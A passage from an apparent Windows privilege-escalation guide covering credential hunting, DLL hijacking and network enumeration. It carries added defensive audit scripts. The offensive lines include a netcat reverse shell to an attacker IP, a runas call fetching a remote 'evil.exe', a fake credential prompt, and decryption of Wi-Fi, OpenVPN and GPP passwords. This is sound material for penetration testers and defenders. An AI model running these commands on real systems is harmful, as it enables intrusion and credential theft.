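    hits: List[Tuple[int, str, str]] = []
    for line in log_text.splitlines():
        m = _EVENT.search(line)
        if m and m.group(3) == "CreateFile" and is_suspicious_open(m.group(4)):
            hits.append((int(m.group(1)), m.group(2), m.group(4)))
    return hits
```

Pair the path match with the IOCTL-sequence monitoring mentioned above; a bare device open by the vendor agent is normal, the trailing component is the signal.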
PATH DLL Hijacking
If you have write permissions inside a folder present on PATH you could be able to hijack a DLL loaded by a process and escalate privileges.
Check permissions of all folders inside PATH:
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )
See the following page for more info about how to abuse this check:
Writable Sys Path +Dll Hijacking Privesc
Network
Shares
net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares
hosts file
Check for other known computers hardcoded in the hosts file
type C:\Windows\System32\drivers\etc\hosts
Network Interfaces & DNS
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
Open Ports
Check for services that are restricted from the outside
netstat -ano #Opened ports?
Routing Table
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
ARP Table
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress
Firewall Rules
Check this page for Firewall related commands (list rules, create rules, turn off, turn off...)
More commands for network enumeration here
Windows Subsystem for Linux (wsl)
C:\Windows\System32\bash.exe
C:\Windows\System32\wsl.exe
The binary bash.exe can also be found in C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe
If you get the root user you can listen on any port (the first time you use nc.exe to listen on a port it will ask via GUI whether nc should be allowed through the firewall).
wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
To easily start bash as root, you can try --default-user root
You can explore the WSL filesystem in the folder C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\
Windows Credentials
Winlogon Credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
#Other way
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword
Credentials manager / Windows vault
From https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault
The Windows Vault stores user credentials for servers, websites and other programs that Windows can log in the users automatically. At first instance, this might look like now users can store their Facebook credentials, Twitter credentials, Gmail credentials etc., so that they automatically log in via browsers. But it is not so.
Windows Vault stores credentials that Windows can log in the users automatically, which means that any Windows application that needs credentials to access a resource (server or a website) can make use of this Credential Manager & Windows Vault and use the credentials supplied instead of users entering the username and password all the time.
Unless the applications interact with Credential Manager, I don't think it is possible for them to use the credentials for a given resource. So, if your application wants to make use of the vault, it should somehow communicate with the credential manager and request the credentials for that resource from the default storage vault.
Use the cmdkey to list the stored credentials on the machine.
cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator
Then you can use runas with the /savecred option in order to use the saved credentials. The following example is calling a remote binary via an SMB share.
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
Using runas with a provided set of credentials.
C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
Note that mimikatz, lazagne, credentialfileview, VaultPasswordView, or the Empire PowerShell module can also be used.
DPAPI
The Data Protection API (DPAPI) provides a method for symmetric encryption of data, predominantly used within the Windows operating system for the symmetric encryption of asymmetric private keys. This encryption leverages a user or system secret to contribute significantly to the entropy.
DPAPI enables the encryption of keys through a symmetric key that is derived from the user's login secrets. In scenarios involving system encryption, it utilizes the system's domain authentication secrets.
User RSA keys encrypted with DPAPI are stored in the %APPDATA%\Microsoft\Protect\{SID} directory, where {SID} represents the user's Security Identifier. The DPAPI key, co-located in the same file with the master key that safeguards the user's private keys, typically consists of 64 bytes of random data. (Note that access to this directory is restricted: its contents cannot be listed with the dir command in CMD, though they can be listed through PowerShell.)
Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect\
You can use the mimikatz module dpapi::masterkey with the appropriate arguments (/pvk or /rpc) to decrypt it.
The credentials files protected by the master password are usually located in:
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
You can use the mimikatz module dpapi::cred with the appropriate /masterkey to decrypt them.
PowerShell Credentials
PowerShell credentials are often used for scripting and automation tasks as a way to store encrypted credentials conveniently. The credentials are protected using DPAPI, which typically means they can only be decrypted by the same user on the same computer they were created on.
You can extract many DPAPI masterkeys from memory with the sekurlsa::dpapi module (if you are root).
To decrypt PS credentials from the file containing them you can do:
PS C:\> $credential = Import-Clixml -Path 'C:\pass.xml'
PS C:\> $credential.GetNetworkCredential().username
john
PS C:\htb> $credential.GetNetworkCredential().password
JustAPWD!
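The property the DPAPI and PowerShell-credential paragraphs above rely on (a blob unprotects only for the same user, or on the same machine for machine scope, and only with the same optional entropy) can be checked directly with the .NET ProtectedData class. The following is an added example, not HackTricks' own code; Protect-Secret, Unprotect-Secret, the sample secret and the entropy string are constructed for the demonstration:

```powershell
# Added example, not HackTricks' own code: DPAPI round trip with System.Security.Cryptography.ProtectedData.
# Function names, the sample secret and the entropy string are constructed for this demonstration.
Add-Type -AssemblyName System.Security

function Protect-Secret {
    param(
        [Parameter(Mandatory)][string]$Plaintext,
        [byte[]]$Entropy = $null,
        [System.Security.Cryptography.DataProtectionScope]$Scope = 'CurrentUser'
    )
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($Plaintext)
    # CurrentUser: key material derived from the user's logon secret (the master key under %APPDATA%\Microsoft\Protect\{SID}).
    # LocalMachine: machine secret, so any process on this host can unprotect the blob.
    [System.Security.Cryptography.ProtectedData]::Protect($bytes, $Entropy, $Scope)
}

function Unprotect-Secret {
    param(
        [Parameter(Mandatory)][byte[]]$Blob,
        [byte[]]$Entropy = $null,
        [System.Security.Cryptography.DataProtectionScope]$Scope = 'CurrentUser'
    )
    try {
        $bytes = [System.Security.Cryptography.ProtectedData]::Unprotect($Blob, $Entropy, $Scope)
        return [System.Text.Encoding]::Unicode.GetString($bytes)
    }
    catch [System.Security.Cryptography.CryptographicException] {
        # Another user, another machine (LocalMachine scope) or different entropy all land here.
        return "<unprotect failed: $($_.Exception.Message)>"
    }
}

$secret  = 'S3cretValue'                                                  # constructed
$entropy = [System.Text.Encoding]::UTF8.GetBytes('app-specific-entropy')  # constructed

$blob = Protect-Secret -Plaintext $secret -Entropy $entropy
"Blob length     : $($blob.Length) bytes (DPAPI header + ciphertext)"
"Correct entropy : " + (Unprotect-Secret -Blob $blob -Entropy $entropy)
# Same user but without the entropy: DPAPI refuses. This is why applications such as OpenVPN-GUI
# (see its decryption snippet further down) add their own entropy on top of the user secret.
"Missing entropy : " + (Unprotect-Secret -Blob $blob)
# Machine scope protects against copying the blob to another host, not against other local users.
$machineBlob = Protect-Secret -Plaintext $secret -Scope LocalMachine
"Machine scope   : " + (Unprotect-Secret -Blob $machineBlob -Scope LocalMachine)
```

Run it once as one user and again as another user on the same machine: the CurrentUser blob fails for the second user while the LocalMachine blob still opens, which is exactly the boundary that decides whether a stored credential is exposed to a low-privileged account on a shared host.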
Wifi
#List saved Wifi using
netsh wlan show profile
#To get the clear-text password use
netsh wlan show profile <SSID> key=clear
#Oneliner to extract all wifi passwords
cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name="%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
Saved RDP Connections
You can find them on HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\
and in HKCU\Software\Microsoft\Terminal Server Client\Servers\
Recently Run Commands
HKU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Remote Desktop Credential Manager
%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
Use the Mimikatz dpapi::rdg module with the appropriate /masterkey to decrypt any .rdg files.
You can extract many DPAPI masterkeys from memory with the Mimikatz sekurlsa::dpapi module.
Sticky Notes
People often use the StickyNotes app on Windows workstations to save passwords and other information, not realizing it is a database file. This file is located at C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite and is always worth searching for and examining.
AppCmd.exe
Note that to recover passwords from AppCmd.exe you need to be Administrator and run under a High Integrity level.
AppCmd.exe is located in the %systemroot%\system32\inetsrv\ directory.
If this file exists then it is possible that some credentials have been configured and can be recovered.
This code was extracted from PowerUp:
function Get-ApplicationHost {
    $OrigError = $ErrorActionPreference
    $ErrorActionPreference = "SilentlyContinue"

    # Check if appcmd.exe exists
    if (Test-Path ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
        # Create data table to house results
        $DataTable = New-Object System.Data.DataTable

        # Create and name columns in the data table
        $Null = $DataTable.Columns.Add("user")
        $Null = $DataTable.Columns.Add("pass")
        $Null = $DataTable.Columns.Add("type")
        $Null = $DataTable.Columns.Add("vdir")
        $Null = $DataTable.Columns.Add("apppool")

        # Get list of application pools
        Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {
            # Get application pool name
            $PoolName = $_

            # Get username
            $PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
            $PoolUser = Invoke-Expression $PoolUserCmd

            # Get password
            $PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
            $PoolPassword = Invoke-Expression $PoolPasswordCmd

            # Check if credentials exists
            if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
                # Add credentials to database
                $Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)
            }
        }

        # Get list of virtual directories
        Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | ForEach-Object {
            # Get Virtual Directory Name
            $VdirName = $_

            # Get username
            $VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcm.exe list vdir " + "`"$VdirName`" /text:userName"
            $VdirUser = Invoke-Expression $VdirUserCmd

            # Get password
            $VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"
            $VdirPassword = Invoke-Expression $VdirPasswordCmd

            # Check if credentials exists
            if (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {
                # Add credentials to database
                $Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')
            }
        }

        # Check if any passwords were found
        if( $DataTable.rows.Count -gt 0 ) {
            # Display results in list view that can feed into the pipeline
            $DataTable | Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
        }
        else {
            # Status user
            Write-Verbose 'No application pool or virtual directory passwords were found.'
            $False
        }
    }
    else {
        Write-Verbose 'Appcmd.exe does not exist in the default location.'
        $False
    }
    $ErrorActionPreference = $OrigError
}
SCClient / SCCM
Check if C:\Windows\CCM\SCClient.exe exists.
The installer runs with SYSTEM privileges, and many are vulnerable to DLL Sideloading (info from https://github.com/enjoiz/Privesc).
$result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion
if ($result) { $result }
else { Write "Not Installed." }
Files and Registry (Credentials)
Putty Creds
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there
Putty SSH Host Keys
reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\
SSH keys in registry
SSH private keys can be stored inside the registry key HKCU\Software\OpenSSH\Agent\Keys, so you should check if there is anything interesting in there:
reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys'
If you find any entry inside that path it will probably be a saved SSH key. It is stored encrypted but can be easily decrypted using https://github.com/ropnop/windows_sshagent_extract.
More information about this technique here: https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/
If the ssh-agent service is not running and you want it to start automatically on boot, run:
Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service
Tip
It looks like this technique isn't valid anymore. I tried to create some ssh keys, add them with ssh-add and login via ssh to a machine. The registry HKCU\Software\OpenSSH\Agent\Keys doesn't exist and procmon didn't identify the usage of dpapi.dll during the asymmetric key authentication.
Unattended files
C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
You can also search for these files using metasploit: post/windows/gather/enum_unattend
Example content:
<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
    <AutoLogon>
        <Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
        <Enabled>true</Enabled>
        <Username>Administrateur</Username>
    </AutoLogon>
    <UserAccounts>
        <LocalAccounts>
            <LocalAccount wcm:action="add">
                <Password>*SENSITIVE*DATA*DELETED*</Password>
                <Group>administrators;users</Group>
                <Name>Administrateur</Name>
            </LocalAccount>
        </LocalAccounts>
    </UserAccounts>
</component>
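An audit for the locations listed above, added here as an example (not HackTricks' own code): Get-UnattendPasswordFindings and the sample file written to %TEMP% are constructed. It handles both the XML answer files and the INI-style sysprep.inf/unattend.txt forms, reports which Password elements still hold a value, and never prints the value itself:

```powershell
# Added example, not HackTricks' own code. Function name and the sample file are constructed;
# the path list is the one given above. Nothing printed contains the password value itself.
$unattendLocations = @(
    "$env:SystemRoot\sysprep\sysprep.xml", "$env:SystemRoot\sysprep\sysprep.inf", "$env:SystemRoot\sysprep.inf",
    "$env:SystemRoot\Panther\Unattended.xml", "$env:SystemRoot\Panther\Unattend.xml",
    "$env:SystemRoot\Panther\Unattend\Unattend.xml", "$env:SystemRoot\Panther\Unattend\Unattended.xml",
    "$env:SystemRoot\System32\Sysprep\unattend.xml", "$env:SystemRoot\System32\Sysprep\unattended.xml",
    "$env:SystemDrive\unattend.txt", "$env:SystemDrive\unattend.inf"
)
$scrubbed = '*SENSITIVE*DATA*DELETED*'   # what sysprep writes into Password elements it has cleaned

function Get-UnattendPasswordFindings {
    param([string[]]$Paths)
    foreach ($path in $Paths) {
        if (-not (Test-Path -LiteralPath $path -PathType Leaf)) { continue }
        if ([IO.Path]::GetExtension($path) -ne '.xml') {
            # .inf/.txt answer files: INI-style "AdminPassword=..." / "DomainAdminPassword=..." lines ("*" means prompt)
            foreach ($line in Get-Content -LiteralPath $path) {
                if ($line -match '(?i)^\s*(\w*password)\s*=\s*"?([^"]*)"?\s*$' -and $Matches[2] -ne '' -and $Matches[2] -ne '*') {
                    [pscustomobject]@{ File = $path; Section = $Matches[1]; Account = ''; Length = $Matches[2].Length; Base64Like = $false }
                }
            }
            continue
        }
        try { [xml]$doc = Get-Content -LiteralPath $path -Raw -ErrorAction Stop }
        catch { Write-Warning "Cannot parse ${path}: $_"; continue }
        # local-name() ignores the unattend namespace, so AutoLogon, LocalAccount and AdministratorPassword all match.
        foreach ($pw in $doc.SelectNodes('//*[local-name()="Password" or local-name()="AdministratorPassword"]')) {
            $value = $pw.SelectSingleNode('*[local-name()="Value"]')
            $text  = if ($value) { $value.InnerText.Trim() } else { $pw.InnerText.Trim() }
            if ($text -eq '' -or $text -eq $scrubbed) { continue }
            $acct = $pw.ParentNode.SelectSingleNode('*[local-name()="Username" or local-name()="Name"]')
            $accountName = if ($acct) { $acct.InnerText } else { '' }
            [pscustomobject]@{
                File       = $path
                Section    = $pw.ParentNode.LocalName        # AutoLogon, LocalAccount, UserAccounts, ...
                Account    = $accountName
                Length     = $text.Length
                # <PlainText>false</PlainText> only means Base64-encoded, not encrypted: still a finding.
                Base64Like = ($text -match '^[A-Za-z0-9+/]+=*$')
            }
        }
    }
}

# Constructed sample in %TEMP%, modelled on the example content above (AutoLogon left in, LocalAccount scrubbed).
$sample = Join-Path $env:TEMP 'unattend-sample.xml'
@'
<unattend xmlns="urn:schemas-microsoft-com:unattend" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password><Value>Q29uc3RydWN0ZWRTYW1wbGU=</Value><PlainText>false</PlainText></Password>
        <Enabled>true</Enabled>
        <Username>Administrateur</Username>
      </AutoLogon>
      <UserAccounts><LocalAccounts><LocalAccount wcm:action="add">
        <Password>*SENSITIVE*DATA*DELETED*</Password>
        <Name>Administrateur</Name>
      </LocalAccount></LocalAccounts></UserAccounts>
    </component>
  </settings>
</unattend>
'@ | Set-Content -LiteralPath $sample -Encoding UTF8

Get-UnattendPasswordFindings -Paths ($unattendLocations + $sample) | Format-Table -AutoSize
Remove-Item -LiteralPath $sample
```

The sample produces a single AutoLogon finding for Administrateur; on a real host the remediation is to delete the leftover answer file (sysprep does not need it after setup) and rotate the account whose password it held.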
SAM & SYSTEM backups
# Usually %SYSTEMROOT% = C:\Windows
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
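Whether these copies are actually exposed depends on their ACLs: the live hives under System32\config are locked and admin-only by default, while the repair\ and RegBack\ copies are the ones that get left readable. The following added example (not HackTricks' own code; Get-HiveCopyExposure is an assumed name) reports, for each copy that exists, which broad principals hold read access. Run it elevated, since reading those ACLs normally requires administrative rights:

```powershell
# Added example, not HackTricks' own code. Function name is constructed; the path list is the one above.
$hiveCopies = @(
    "$env:SystemRoot\repair\SAM", "$env:SystemRoot\repair\system",
    "$env:SystemRoot\System32\config\RegBack\SAM", "$env:SystemRoot\System32\config\RegBack\system",
    "$env:SystemRoot\System32\config\SAM", "$env:SystemRoot\System32\config\SYSTEM"
)
# Well-known SIDs that mean "any local user": Everyone, Authenticated Users, BUILTIN\Users, INTERACTIVE
$broadSids = 'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-4'

function Get-HiveCopyExposure {
    param([string[]]$Paths)
    foreach ($path in $Paths) {
        if (-not (Test-Path -LiteralPath $path -PathType Leaf)) { continue }
        $item = Get-Item -LiteralPath $path -Force
        try { $acl = Get-Acl -LiteralPath $path -ErrorAction Stop }
        catch { Write-Warning "Cannot read ACL of ${path}: $_"; continue }
        $exposed = foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            try   { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
            catch { $sid = $ace.IdentityReference.Value }
            if ($broadSids -notcontains $sid) { continue }
            # ReadData is the bit every read-capable right (Read, ReadAndExecute, Modify, FullControl) includes.
            # Unmapped generic rights show up as raw numbers and are not matched here.
            if (($ace.FileSystemRights -band [System.Security.AccessControl.FileSystemRights]::ReadData) -eq 0) { continue }
            "$($ace.IdentityReference) [$($ace.FileSystemRights)]"
        }
        $summary = if ($exposed) { $exposed -join '; ' } else { 'none' }
        [pscustomobject]@{
            Path            = $path
            SizeKB          = [math]::Round($item.Length / 1KB)
            LastWrite       = $item.LastWriteTime
            Owner           = $acl.Owner
            BroadReadAccess = $summary
        }
    }
}

Get-HiveCopyExposure -Paths $hiveCopies | Format-Table -AutoSize
```

Any row with BroadReadAccess other than "none" is a copy of the local account database that every user can take offline; removing the stale copy (or restricting it to Administrators and SYSTEM) closes it.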
Cloud Credentials
#From user home
.aws\credentials
AppData\Roaming\gcloud\credentials.db
AppData\Roaming\gcloud\legacy_credentials
AppData\Roaming\gcloud\access_tokens.db
.azure\accessTokens.json
.azure\azureProfile.json
McAfee SiteList.xml
Search for a file called SiteList.xml
Cached GPP Password
A feature was previously available that allowed the deployment of custom local administrator accounts on a group of machines via Group Policy Preferences (GPP). However, this method had significant security flaws. Firstly, the Group Policy Objects (GPOs), stored as XML files in SYSVOL, could be accessed by any domain user. Secondly, the passwords within these GPPs, encrypted with AES256 using a publicly documented default key, could be decrypted by any authenticated user. This posed a serious risk, as it could allow users to gain elevated privileges.
To mitigate this risk, a function was developed to scan for locally cached GPP files containing a "cpassword" field that is not empty. Upon finding such a file, the function decrypts the password and returns a custom PowerShell object. This object includes details about the GPP and the file's location, aiding in the identification and remediation of this security vulnerability.
Search in C:\ProgramData\Microsoft\Group Policy\history or in C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history (previous to W Vista) for these files:
- Groups.xml
- Services.xml
- Scheduledtasks.xml
- DataSources.xml
- Printers.xml
- Drives.xml
To decrypt the cPassword:
#To decrypt these passwords you can decrypt it using
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
Using crackmapexec to get the passwords:
crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin
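As the defender-side counterpart to the scan described in the paragraphs above, the following added example (not HackTricks' own code; Find-GppCpassword and the sample Groups.xml are constructed, and the cpassword value in the sample is the one from the gpp-decrypt line) locates cached GPP files that still carry a cpassword attribute and reports the item and the account it belongs to, without decrypting anything:

```powershell
# Added example, not HackTricks' own code. Function name and the sample Groups.xml are constructed.
$gppHistoryRoots = @(
    "$env:ProgramData\Microsoft\Group Policy\history",
    "$env:SystemDrive\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history"
)
$gppFileNames = 'Groups.xml', 'Services.xml', 'ScheduledTasks.xml', 'DataSources.xml', 'Printers.xml', 'Drives.xml'

function Find-GppCpassword {
    param([string[]]$Roots)
    foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        Get-ChildItem -LiteralPath $root -Recurse -File -ErrorAction SilentlyContinue |
            Where-Object { $gppFileNames -contains $_.Name } |
            ForEach-Object {
                $file = $_
                try { [xml]$doc = Get-Content -LiteralPath $file.FullName -Raw -ErrorAction Stop }
                catch { Write-Warning "Cannot parse $($file.FullName): $_"; return }
                # Every preference type stores the secret in a cpassword attribute of its Properties element.
                foreach ($props in $doc.SelectNodes('//*[@cpassword]')) {
                    $cp = $props.GetAttribute('cpassword')
                    if ([string]::IsNullOrEmpty($cp)) { continue }   # empty cpassword = no password set
                    # The account attribute differs per type: userName (Groups, Drives), username
                    # (DataSources, Printers), runAs (ScheduledTasks), accountName (Services).
                    $account = @('userName', 'username', 'runAs', 'accountName') |
                        ForEach-Object { $props.GetAttribute($_) } | Where-Object { $_ } | Select-Object -First 1
                    [pscustomobject]@{
                        File            = $file.FullName
                        Item            = $props.ParentNode.LocalName   # User, NTService, Task, Drive, ...
                        Account         = $account
                        Changed         = $props.ParentNode.GetAttribute('changed')
                        CpasswordLength = $cp.Length
                    }
                }
            }
    }
}

# Constructed sample: a Groups.xml preference item of the shape found in the history folders.
$sampleRoot = Join-Path $env:TEMP 'gpp-history-sample'
New-Item -ItemType Directory -Path $sampleRoot -Force | Out-Null
@'
<Groups>
  <User name="LocalAdmin" image="2" changed="2014-01-01 12:00:00">
    <Properties action="U" newName="" fullName="" description="constructed sample" cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="LocalAdmin"/>
  </User>
</Groups>
'@ | Set-Content -LiteralPath (Join-Path $sampleRoot 'Groups.xml') -Encoding UTF8

Find-GppCpassword -Roots ($gppHistoryRoots + $sampleRoot) | Format-List
Remove-Item -LiteralPath $sampleRoot -Recurse
```

Because the decryption key is public, a non-empty cpassword is equivalent to a plaintext password: the fix is to remove the preference item from the GPO (which also clears the cached copies on the next policy refresh) and rotate the account, not to recover the value.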
IIS Web Config
Get-Childitem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config
Get-Childitem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Get-Childitem -Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Example of web.config with credentials:
<authentication mode="Forms">
    <forms name="login" loginUrl="/admin">
        <credentials passwordFormat = "Clear">
            <user name="Administrator" password="SuperAdminPassword" />
        </credentials>
    </forms>
</authentication>
OpenVPN credentials
Add-Type -AssemblyName System.Security
$keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs"
$items = $keys | ForEach-Object {Get-ItemProperty $_.PsPath}
foreach ($item in $items)
{
    $encryptedbytes=$item.'auth-data'
    $entropy=$item.'entropy'
    $entropy=$entropy[0..(($entropy.Length)-2)]
    $decryptedbytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
        $encryptedBytes,
        $entropy,
        [System.Security.Cryptography.DataProtectionScope]::CurrentUser)
    Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes))
}
Logs
# IIS
C:\inetpub\logs\LogFiles\*
#Apache
Get-Childitem -Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue
Ask for credentials
You can always ask the user to enter his credentials, or even the credentials of a different user if you think he could know them (notice that asking the client directly for the credentials is really risky):
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password
#Get plaintext
$cred.GetNetworkCredential() | fl
Possible filenames containing credentials
Known files that some time ago contained passwords in clear-text or Base64
$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history
vnc.ini, ultravnc.ini, *vnc*
web.config
php.ini httpd.conf httpd-xampp.conf my.ini my.cnf (XAMPP, Apache, PHP)
SiteList.xml #McAfee
ConsoleHost_history.txt #PS-History
*.gpg
*.pgp
*config*.php
elasticsearch.y*ml
kibana.y*ml
*.p12
*.der
*.csr
*.cer
known_hosts
id_rsa
id_dsa
*.ovpn
anaconda-ks.cfg
hostapd.conf
rsyncd.conf
cesi.conf
supervisord.conf
tomcat-users.xml
*.kdbx
KeePass.config
Ntds.dit
SAM
SYSTEM
FreeSSHDservice.ini
access.log
error.log
server.xml
ConsoleHost_history.txt
setupinfo
setupinfo.bak
key3.db #Firefox
key4.db #Firefox
places.sqlite #Firefox
"Login Data" #Chrome
Cookies #Chrome
Bookmarks #Chrome
History #Chrome
TypedURLsTime #IE
TypedURLs #IE
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
cd C:\
